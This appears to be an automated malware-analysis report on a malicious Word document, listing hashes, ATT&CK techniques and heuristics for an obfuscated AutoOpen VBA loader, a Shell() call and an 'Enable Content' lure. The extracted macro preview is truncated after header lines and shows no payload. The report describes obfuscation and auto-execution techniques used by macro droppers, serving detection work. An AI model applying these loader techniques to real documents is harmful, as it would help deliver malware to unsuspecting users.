Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0fab6ba2713b6d92…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 238.0 KB
Created: 2018-09-18 06:08:00
Authoring application: Microsoft Office Word
First seen: 2019-03-10
MD5: 68a23bb184618ff6008c6f7886fa3c89
SHA-1: a05fddd9081990f8d265488e6461e86d444b26dc
SHA-256: 0fab6ba2713b6d9279182f9830e6ccdb647021d1897e3bdcb0718e8ec7ccdb61
Risk score: 322

Malware Insights

MITRE ATT&CK
  • T1566.001 Spearphishing Attachment
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter

The sample is a malicious Office document containing obfuscated VBA macros. The AutoOpen macro is designed to execute a payload, likely by leveraging the Shell() function as indicated by critical heuristic firings. The document body explicitly instructs the user to 'Enable Content', a common lure for macro-based malware.

Heuristics (9)

  • ClamAV: Doc.Malware.Generic-6923090-0 (critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-6923090-0
  • VBA macros detected (medium; 4 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA (critical) OLE_VBA_SHELL
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader (critical) OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro (high) OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure (medium) SE_ENABLE_LURE
    Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 169959 bytes
SHA-256: cb1643b973fd5c5086d758417eb74449435179044a06c32b04b9cc7e16b630e1

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
... (truncated)